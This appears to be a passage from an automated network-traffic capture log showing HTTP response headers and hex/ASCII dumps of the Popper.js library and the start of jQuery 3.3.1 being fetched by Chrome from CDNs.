                                                                                Cache-Control: public, max-age=30672000
                                                                                ETag: W/"5eb03fa9-500f"
                                                                                Last-Modified: Mon, 04 May 2020 16:15:37 GMT
                                                                                cf-cdnjs-via: cfworker/kv
                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                Timing-Allow-Origin: *
                                                                                X-Content-Type-Options: nosniff
                                                                                CF-Cache-Status: HIT
                                                                                Age: 5698
                                                                                Expires: Tue, 01 Oct 2024 15:42:16 GMT
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1U%2FcFdyw7Pqy%2Fk2PlrXfyZ2SPa2C6kdUl4AEeI18O34AjVpkq6tKtyLAJZkJdMgFNGcpXfb8b1l45tSHn5BWknAX8CwOM13leNzRevKB1xaKiGxXTe%2BP0rs%2FJg69Qiq2wZUS6n97"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                Strict-Transport-Security: max-age=15780000
                                                                                Server: cloudflare
                                                                                CF-RAY: 815073a709620fb1-LAX
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                2023-10-12 15:42:16 UTC693INData Raw: 35 30 30 66 0d 0a 2f 2a 0a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 46 65 64 65 72 69 63 6f 20 5a 69 76 6f 6c 6f 20 32 30 31 38 0a 20 44 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 28 6c 69 63 65 6e 73 65 20 74 65 72 6d 73 20 61 72 65 20 61 74 20 68 74 74 70 3a 2f 2f 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4d 49 54 29 2e 0a 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 27 6f 62 6a 65 63 74 27 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 27 75 6e 64 65 66 69 6e 65 64 27 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 27 66 75 6e 63 74 69 6f 6e 27 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26
                                                                                Data Ascii: 500f/* Copyright (C) Federico Zivolo 2018 Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT). */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&
                                                                                2023-10-12 15:42:16 UTC693INData Raw: 2e 6e 6f 64 65 54 79 70 65 29 72 65 74 75 72 6e 5b 5d 3b 76 61 72 20 6f 3d 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 2c 6e 75 6c 6c 29 3b 72 65 74 75 72 6e 20 74 3f 6f 5b 74 5d 3a 6f 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 72 65 74 75 72 6e 27 48 54 4d 4c 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 3f 65 3a 65 2e 70 61 72 65 6e 74 4e 6f 64 65 7c 7c 65 2e 68 6f 73 74 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 73 77 69 74 63 68 28 65 2e 6e 6f 64 65 4e 61 6d 65 29 7b 63 61 73 65 27 48 54 4d 4c 27 3a 63 61 73 65 27 42 4f 44 59 27 3a 72 65 74 75 72 6e 20 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 63 61 73 65 27 23 64 6f 63 75 6d 65 6e 74 27 3a
                                                                                Data Ascii: .nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':
                                                                                2023-10-12 15:42:16 UTC695INData Raw: 61 6d 65 3b 69 66 28 27 42 4f 44 59 27 3d 3d 3d 6e 7c 7c 27 48 54 4d 4c 27 3d 3d 3d 6e 29 7b 76 61 72 20 69 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 72 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 73 63 72 6f 6c 6c 69 6e 67 45 6c 65 6d 65 6e 74 7c 7c 69 3b 72 65 74 75 72 6e 20 72 5b 6f 5d 7d 72 65 74 75 72 6e 20 65 5b 6f 5d 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 65 2c 74 29 7b 76 61 72 20 6f 3d 32 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 2c 6e 3d 61 28 74 2c 27 74 6f 70 27 29 2c 69 3d 61 28 74 2c 27 6c 65 66 74 27 29 2c 72 3d 6f 3f 2d 31 3a 31 3b 72 65 74 75 72 6e 20 65 2e 74
                                                                                Data Ascii: ame;if('BODY'===n||'HTML'===n){var i=e.ownerDocument.documentElement,r=e.ownerDocument.scrollingElement||i;return r[o]}return e[o]}function l(e,t){var o=2<arguments.length&&void 0!==arguments[2]&&arguments[2],n=a(t,'top'),i=a(t,'left'),r=o?-1:1;return e.t
                                                                                2023-10-12 15:42:16 UTC696INData Raw: 66 75 6e 63 74 69 6f 6e 20 75 28 65 2c 6f 29 7b 76 61 72 20 69 3d 32 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 2c 72 3d 69 65 28 31 30 29 2c 70 3d 27 48 54 4d 4c 27 3d 3d 3d 6f 2e 6e 6f 64 65 4e 61 6d 65 2c 73 3d 67 28 65 29 2c 64 3d 67 28 6f 29 2c 61 3d 6e 28 65 29 2c 66 3d 74 28 6f 29 2c 6d 3d 70 61 72 73 65 46 6c 6f 61 74 28 66 2e 62 6f 72 64 65 72 54 6f 70 57 69 64 74 68 2c 31 30 29 2c 68 3d 70 61 72 73 65 46 6c 6f 61 74 28 66 2e 62 6f 72 64 65 72 4c 65 66 74 57 69 64 74 68 2c 31 30 29 3b 69 26 26 27 48 54 4d 4c 27 3d 3d 3d 6f 2e 6e 6f 64 65 4e 61 6d 65 26 26 28 64 2e 74 6f 70 3d 51 28 64 2e 74 6f 70 2c 30 29 2c 64 2e 6c 65 66 74 3d
                                                                                Data Ascii: function u(e,o){var i=2<arguments.length&&void 0!==arguments[2]&&arguments[2],r=ie(10),p='HTML'===o.nodeName,s=g(e),d=g(o),a=n(e),f=t(o),m=parseFloat(f.borderTopWidth,10),h=parseFloat(f.borderLeftWidth,10);i&&'HTML'===o.nodeName&&(d.top=Q(d.top,0),d.left=
                                                                                2023-10-12 15:42:16 UTC697INData Raw: 3d 6e 28 6f 28 74 29 29 2c 27 42 4f 44 59 27 3d 3d 3d 6c 2e 6e 6f 64 65 4e 61 6d 65 26 26 28 6c 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 29 29 3a 27 77 69 6e 64 6f 77 27 3d 3d 3d 72 3f 6c 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3a 6c 3d 72 3b 76 61 72 20 66 3d 75 28 6c 2c 61 2c 70 29 3b 69 66 28 27 48 54 4d 4c 27 3d 3d 3d 6c 2e 6e 6f 64 65 4e 61 6d 65 26 26 21 79 28 61 29 29 7b 76 61 72 20 6d 3d 68 28 29 2c 63 3d 6d 2e 68 65 69 67 68 74 2c 67 3d 6d 2e 77 69 64 74 68 3b 73 2e 74 6f 70 2b 3d 66 2e 74 6f 70 2d 66 2e 6d 61 72 67 69 6e 54 6f 70 2c 73 2e 62 6f 74 74 6f 6d 3d 63 2b 66 2e 74 6f 70 2c 73 2e 6c 65 66 74 2b 3d 66 2e 6c 65 66 74 2d 66 2e 6d
                                                                                Data Ascii: =n(o(t)),'BODY'===l.nodeName&&(l=e.ownerDocument.documentElement)):'window'===r?l=e.ownerDocument.documentElement:l=r;var f=u(l,a,p);if('HTML'===l.nodeName&&!y(a)){var m=h(),c=m.height,g=m.width;s.top+=f.top-f.marginTop,s.bottom=c+f.top,s.left+=f.left-f.m
                                                                                2023-10-12 15:42:16 UTC699INData Raw: 2c 74 6f 70 3a 27 62 6f 74 74 6f 6d 27 7d 3b 72 65 74 75 72 6e 20 65 2e 72 65 70 6c 61 63 65 28 2f 6c 65 66 74 7c 72 69 67 68 74 7c 62 6f 74 74 6f 6d 7c 74 6f 70 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 5b 65 5d 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 54 28 65 2c 74 2c 6f 29 7b 6f 3d 6f 2e 73 70 6c 69 74 28 27 2d 27 29 5b 30 5d 3b 76 61 72 20 6e 3d 4c 28 65 29 2c 69 3d 7b 77 69 64 74 68 3a 6e 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 6e 2e 68 65 69 67 68 74 7d 2c 72 3d 2d 31 21 3d 3d 5b 27 72 69 67 68 74 27 2c 27 6c 65 66 74 27 5d 2e 69 6e 64 65 78 4f 66 28 6f 29 2c 70 3d 72 3f 27 74 6f 70 27 3a 27 6c 65 66 74 27 2c 73 3d 72 3f 27 6c 65 66 74 27 3a 27 74 6f 70 27 2c 64 3d 72 3f 27 68 65 69 67 68 74 27 3a 27 77 69 64 74 68 27 2c 61
                                                                                Data Ascii: ,top:'bottom'};return e.replace(/left|right|bottom|top/g,function(e){return t[e]})}function T(e,t,o){o=o.split('-')[0];var n=L(e),i={width:n.width,height:n.height},r=-1!==['right','left'].indexOf(o),p=r?'top':'left',s=r?'left':'top',d=r?'height':'width',a
                                                                                2023-10-12 15:42:16 UTC700INData Raw: 73 2e 72 65 66 65 72 65 6e 63 65 2c 65 2e 70 6c 61 63 65 6d 65 6e 74 29 2c 65 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 2e 70 6f 73 69 74 69 6f 6e 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 70 6f 73 69 74 69 6f 6e 46 69 78 65 64 3f 27 66 69 78 65 64 27 3a 27 61 62 73 6f 6c 75 74 65 27 2c 65 3d 4e 28 74 68 69 73 2e 6d 6f 64 69 66 69 65 72 73 2c 65 29 2c 74 68 69 73 2e 73 74 61 74 65 2e 69 73 43 72 65 61 74 65 64 3f 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6f 6e 55 70 64 61 74 65 28 65 29 3a 28 74 68 69 73 2e 73 74 61 74 65 2e 69 73 43 72 65 61 74 65 64 3d 21 30 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6f 6e 43 72 65 61 74 65 28 65 29 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 50 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 2e 73 6f 6d 65 28 66 75 6e 63 74 69 6f 6e
                                                                                Data Ascii: s.reference,e.placement),e.offsets.popper.position=this.options.positionFixed?'fixed':'absolute',e=N(this.modifiers,e),this.state.isCreated?this.options.onUpdate(e):(this.state.isCreated=!0,this.options.onCreate(e))}}function P(e,t){return e.some(function
                                                                                2023-10-12 15:42:16 UTC701INData Raw: 6e 20 4d 28 29 7b 74 68 69 73 2e 73 74 61 74 65 2e 65 76 65 6e 74 73 45 6e 61 62 6c 65 64 7c 7c 28 74 68 69 73 2e 73 74 61 74 65 3d 49 28 74 68 69 73 2e 72 65 66 65 72 65 6e 63 65 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2c 74 68 69 73 2e 73 74 61 74 65 2c 74 68 69 73 2e 73 63 68 65 64 75 6c 65 55 70 64 61 74 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 48 28 65 29 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 72 65 73 69 7a 65 27 2c 74 2e 75 70 64 61 74 65 42 6f 75 6e 64 29 2c 74 2e 73 63 72 6f 6c 6c 50 61 72 65 6e 74 73 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 73 63 72 6f 6c 6c 27 2c 74 2e 75 70 64 61 74 65 42
                                                                                Data Ascii: n M(){this.state.eventsEnabled||(this.state=I(this.reference,this.options,this.state,this.scheduleUpdate))}function F(e,t){return H(e).removeEventListener('resize',t.updateBound),t.scrollParents.forEach(function(e){e.removeEventListener('scroll',t.updateB
                                                                                2023-10-12 15:42:16 UTC703INData Raw: 28 2e 2a 29 2f 29 2c 72 3d 2b 69 5b 31 5d 2c 70 3d 69 5b 32 5d 3b 69 66 28 21 72 29 72 65 74 75 72 6e 20 65 3b 69 66 28 30 3d 3d 3d 70 2e 69 6e 64 65 78 4f 66 28 27 25 27 29 29 7b 76 61 72 20 73 3b 73 77 69 74 63 68 28 70 29 7b 63 61 73 65 27 25 70 27 3a 73 3d 6f 3b 62 72 65 61 6b 3b 63 61 73 65 27 25 27 3a 63 61 73 65 27 25 72 27 3a 64 65 66 61 75 6c 74 3a 73 3d 6e 3b 7d 76 61 72 20 64 3d 63 28 73 29 3b 72 65 74 75 72 6e 20 64 5b 74 5d 2f 31 30 30 2a 72 7d 69 66 28 27 76 68 27 3d 3d 3d 70 7c 7c 27 76 77 27 3d 3d 3d 70 29 7b 76 61 72 20 61 3b 72 65 74 75 72 6e 20 61 3d 27 76 68 27 3d 3d 3d 70 3f 51 28 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 2c 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 48 65
                                                                                Data Ascii: (.*)/),r=+i[1],p=i[2];if(!r)return e;if(0===p.indexOf('%')){var s;switch(p){case'%p':s=o;break;case'%':case'%r':default:s=n;}var d=c(s);return d[t]/100*r}if('vh'===p||'vw'===p){var a;return a='vh'===p?Q(document.documentElement.clientHeight,window.innerHe
                                                                                2023-10-12 15:42:16 UTC704INData Raw: 3d 3d 64 26 26 28 70 2e 6c 65 66 74 2b 3d 6f 5b 30 5d 2c 70 2e 74 6f 70 2b 3d 6f 5b 31 5d 29 2c 65 2e 70 6f 70 70 65 72 3d 70 2c 65 7d 66 6f 72 28 76 61 72 20 58 3d 4d 61 74 68 2e 6d 69 6e 2c 4a 3d 4d 61 74 68 2e 66 6c 6f 6f 72 2c 51 3d 4d 61 74 68 2e 6d 61 78 2c 5a 3d 27 75 6e 64 65 66 69 6e 65 64 27 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 27 75 6e 64 65 66 69 6e 65 64 27 21 3d 74 79 70 65 6f 66 20 64 6f 63 75 6d 65 6e 74 2c 24 3d 5b 27 45 64 67 65 27 2c 27 54 72 69 64 65 6e 74 27 2c 27 46 69 72 65 66 6f 78 27 5d 2c 65 65 3d 30 2c 74 65 3d 30 3b 74 65 3c 24 2e 6c 65 6e 67 74 68 3b 74 65 2b 3d 31 29 69 66 28 5a 26 26 30 3c 3d 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 69 6e 64 65 78 4f 66 28 24 5b 74 65 5d 29 29 7b 65 65 3d 31
                                                                                Data Ascii: ==d&&(p.left+=o[0],p.top+=o[1]),e.popper=p,e}for(var X=Math.min,J=Math.floor,Q=Math.max,Z='undefined'!=typeof window&&'undefined'!=typeof document,$=['Edge','Trident','Firefox'],ee=0,te=0;te<$.length;te+=1)if(Z&&0<=navigator.userAgent.indexOf($[te])){ee=1
                                                                                2023-10-12 15:42:16 UTC705INData Raw: 5b 74 5d 3d 6f 2c 65 7d 2c 64 65 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6f 3d 31 3b 6f 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 66 6f 72 28 76 61 72 20 6e 20 69 6e 20 74 3d 61 72 67 75 6d 65 6e 74 73 5b 6f 5d 2c 74 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 74 2c 6e 29 26 26 28 65 5b 6e 5d 3d 74 5b 6e 5d 29 3b 72 65 74 75 72 6e 20 65 7d 2c 61 65 3d 5b 27 61 75 74 6f 2d 73 74 61 72 74 27 2c 27 61 75 74 6f 27 2c 27 61 75 74 6f 2d 65 6e 64 27 2c 27 74 6f 70 2d 73 74 61 72 74 27 2c 27 74 6f 70 27 2c 27 74 6f 70 2d 65 6e 64 27 2c 27 72 69 67 68 74 2d 73 74 61 72 74 27 2c 27 72 69 67 68 74 27
                                                                                Data Ascii: [t]=o,e},de=Object.assign||function(e){for(var t,o=1;o<arguments.length;o++)for(var n in t=arguments[o],t)Object.prototype.hasOwnProperty.call(t,n)&&(e[n]=t[n]);return e},ae=['auto-start','auto','auto-end','top-start','top','top-end','right-start','right'
                                                                                2023-10-12 15:42:16 UTC707INData Raw: 74 75 72 6e 20 70 65 28 74 2c 5b 7b 6b 65 79 3a 27 75 70 64 61 74 65 27 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6b 2e 63 61 6c 6c 28 74 68 69 73 29 7d 7d 2c 7b 6b 65 79 3a 27 64 65 73 74 72 6f 79 27 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 42 2e 63 61 6c 6c 28 74 68 69 73 29 7d 7d 2c 7b 6b 65 79 3a 27 65 6e 61 62 6c 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 27 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4d 2e 63 61 6c 6c 28 74 68 69 73 29 7d 7d 2c 7b 6b 65 79 3a 27 64 69 73 61 62 6c 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 27 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 52 2e 63 61 6c 6c 28 74 68 69 73 29 7d 7d 5d 29 2c
                                                                                Data Ascii: turn pe(t,[{key:'update',value:function(){return k.call(this)}},{key:'destroy',value:function(){return B.call(this)}},{key:'enableEventListeners',value:function(){return M.call(this)}},{key:'disableEventListeners',value:function(){return R.call(this)}}]),
                                                                                2023-10-12 15:42:16 UTC708INData Raw: 6f 2c 69 29 7d 7d 3b 72 65 74 75 72 6e 20 69 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 2d 31 3d 3d 3d 5b 27 6c 65 66 74 27 2c 27 74 6f 70 27 5d 2e 69 6e 64 65 78 4f 66 28 65 29 3f 27 73 65 63 6f 6e 64 61 72 79 27 3a 27 70 72 69 6d 61 72 79 27 3b 70 3d 64 65 28 7b 7d 2c 70 2c 73 5b 74 5d 28 65 29 29 7d 29 2c 65 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 3d 70 2c 65 7d 2c 70 72 69 6f 72 69 74 79 3a 5b 27 6c 65 66 74 27 2c 27 72 69 67 68 74 27 2c 27 74 6f 70 27 2c 27 62 6f 74 74 6f 6d 27 5d 2c 70 61 64 64 69 6e 67 3a 35 2c 62 6f 75 6e 64 61 72 69 65 73 45 6c 65 6d 65 6e 74 3a 27 73 63 72 6f 6c 6c 50 61 72 65 6e 74 27 7d 2c 6b 65 65 70 54 6f 67 65 74 68 65 72 3a 7b 6f 72 64 65 72 3a 34 30 30 2c 65 6e 61 62 6c 65 64 3a
                                                                                Data Ascii: o,i)}};return i.forEach(function(e){var t=-1===['left','top'].indexOf(e)?'secondary':'primary';p=de({},p,s[t](e))}),e.offsets.popper=p,e},priority:['left','right','top','bottom'],padding:5,boundariesElement:'scrollParent'},keepTogether:{order:400,enabled:
                                                                                2023-10-12 15:42:16 UTC709INData Raw: 28 58 28 73 5b 6c 5d 2d 75 2c 76 29 2c 30 29 2c 65 2e 61 72 72 6f 77 45 6c 65 6d 65 6e 74 3d 69 2c 65 2e 6f 66 66 73 65 74 73 2e 61 72 72 6f 77 3d 28 6e 3d 7b 7d 2c 73 65 28 6e 2c 6d 2c 4d 61 74 68 2e 72 6f 75 6e 64 28 76 29 29 2c 73 65 28 6e 2c 68 2c 27 27 29 2c 6e 29 2c 65 7d 2c 65 6c 65 6d 65 6e 74 3a 27 5b 78 2d 61 72 72 6f 77 5d 27 7d 2c 66 6c 69 70 3a 7b 6f 72 64 65 72 3a 36 30 30 2c 65 6e 61 62 6c 65 64 3a 21 30 2c 66 6e 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 50 28 65 2e 69 6e 73 74 61 6e 63 65 2e 6d 6f 64 69 66 69 65 72 73 2c 27 69 6e 6e 65 72 27 29 29 72 65 74 75 72 6e 20 65 3b 69 66 28 65 2e 66 6c 69 70 70 65 64 26 26 65 2e 70 6c 61 63 65 6d 65 6e 74 3d 3d 3d 65 2e 6f 72 69 67 69 6e 61 6c 50 6c 61 63 65 6d 65 6e 74 29 72 65 74 75
                                                                                Data Ascii: (X(s[l]-u,v),0),e.arrowElement=i,e.offsets.arrow=(n={},se(n,m,Math.round(v)),se(n,h,''),n),e},element:'[x-arrow]'},flip:{order:600,enabled:!0,fn:function(e,t){if(P(e.instance.modifiers,'inner'))return e;if(e.flipped&&e.placement===e.originalPlacement)retu
                                                                                2023-10-12 15:42:16 UTC711INData Raw: 66 6c 69 70 27 2c 70 61 64 64 69 6e 67 3a 35 2c 62 6f 75 6e 64 61 72 69 65 73 45 6c 65 6d 65 6e 74 3a 27 76 69 65 77 70 6f 72 74 27 7d 2c 69 6e 6e 65 72 3a 7b 6f 72 64 65 72 3a 37 30 30 2c 65 6e 61 62 6c 65 64 3a 21 31 2c 66 6e 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 70 6c 61 63 65 6d 65 6e 74 2c 6f 3d 74 2e 73 70 6c 69 74 28 27 2d 27 29 5b 30 5d 2c 6e 3d 65 2e 6f 66 66 73 65 74 73 2c 69 3d 6e 2e 70 6f 70 70 65 72 2c 72 3d 6e 2e 72 65 66 65 72 65 6e 63 65 2c 70 3d 2d 31 21 3d 3d 5b 27 6c 65 66 74 27 2c 27 72 69 67 68 74 27 5d 2e 69 6e 64 65 78 4f 66 28 6f 29 2c 73 3d 2d 31 3d 3d 3d 5b 27 74 6f 70 27 2c 27 6c 65 66 74 27 5d 2e 69 6e 64 65 78 4f 66 28 6f 29 3b 72 65 74 75 72 6e 20 69 5b 70 3f 27 6c 65 66 74 27 3a 27 74 6f 70 27 5d 3d
                                                                                Data Ascii: flip',padding:5,boundariesElement:'viewport'},inner:{order:700,enabled:!1,fn:function(e){var t=e.placement,o=t.split('-')[0],n=e.offsets,i=n.popper,r=n.reference,p=-1!==['left','right'].indexOf(o),s=-1===['top','left'].indexOf(o);return i[p?'left':'top']=
                                                                                2023-10-12 15:42:16 UTC712INData Raw: 6f 6d 3a 68 2e 74 6f 70 2c 73 3d 27 72 69 67 68 74 27 3d 3d 75 3f 2d 66 2e 77 69 64 74 68 2b 68 2e 72 69 67 68 74 3a 68 2e 6c 65 66 74 2c 61 26 26 62 29 6d 5b 62 5d 3d 27 74 72 61 6e 73 6c 61 74 65 33 64 28 27 2b 73 2b 27 70 78 2c 20 27 2b 64 2b 27 70 78 2c 20 30 29 27 2c 6d 5b 63 5d 3d 30 2c 6d 5b 75 5d 3d 30 2c 6d 2e 77 69 6c 6c 43 68 61 6e 67 65 3d 27 74 72 61 6e 73 66 6f 72 6d 27 3b 65 6c 73 65 7b 76 61 72 20 79 3d 27 62 6f 74 74 6f 6d 27 3d 3d 63 3f 2d 31 3a 31 2c 77 3d 27 72 69 67 68 74 27 3d 3d 75 3f 2d 31 3a 31 3b 6d 5b 63 5d 3d 64 2a 79 2c 6d 5b 75 5d 3d 73 2a 77 2c 6d 2e 77 69 6c 6c 43 68 61 6e 67 65 3d 63 2b 27 2c 20 27 2b 75 7d 76 61 72 20 45 3d 7b 22 78 2d 70 6c 61 63 65 6d 65 6e 74 22 3a 65 2e 70 6c 61 63 65 6d 65 6e 74 7d 3b 72 65 74 75 72
                                                                                Data Ascii: om:h.top,s='right'==u?-f.width+h.right:h.left,a&&b)m[b]='translate3d('+s+'px, '+d+'px, 0)',m[c]=0,m[u]=0,m.willChange='transform';else{var y='bottom'==c?-1:1,w='right'==u?-1:1;m[c]=d*y,m[u]=s*w,m.willChange=c+', '+u}var E={"x-placement":e.placement};retur
                                                                                2023-10-12 15:42:16 UTC713INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                16151.101.2.137443192.168.2.449754C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                2023-10-12 15:42:16 UTC713INHTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Content-Length: 86927
                                                                                Server: nginx
                                                                                Content-Type: application/javascript; charset=utf-8
                                                                                Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                ETag: "28feccc0-1538f"
                                                                                Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                Access-Control-Allow-Origin: *
                                                                                Via: 1.1 varnish, 1.1 varnish
                                                                                Accept-Ranges: bytes
                                                                                Date: Thu, 12 Oct 2023 15:42:16 GMT
                                                                                Age: 1831165
                                                                                X-Served-By: cache-lga13622-LGA, cache-bur-kbur8200026-BUR
                                                                                X-Cache: HIT, HIT
                                                                                X-Cache-Hits: 89, 8167
                                                                                X-Timer: S1697125336.186343,VS0,VE0
                                                                                Vary: Accept-Encoding
                                                                                2023-10-12 15:42:16 UTC714INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20
                                                                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery
                                                                                2023-10-12 15:42:16 UTC715INData Raw: 6d 61 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 72 65 74 75 72 6e 20 65 2e 63 61 6c 6c 28 74 2c 6e 2c 74 29 7d 29 29 7d 2c 73 6c 69 63 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 6f 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 29 7d 2c 66 69 72 73 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 71 28 30 29 7d 2c 6c 61 73 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 71 28 2d 31 29 7d 2c 65 71 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 6c 65 6e 67 74 68 2c 6e 3d 2b 65 2b 28 65 3c 30 3f 74 3a 30 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28
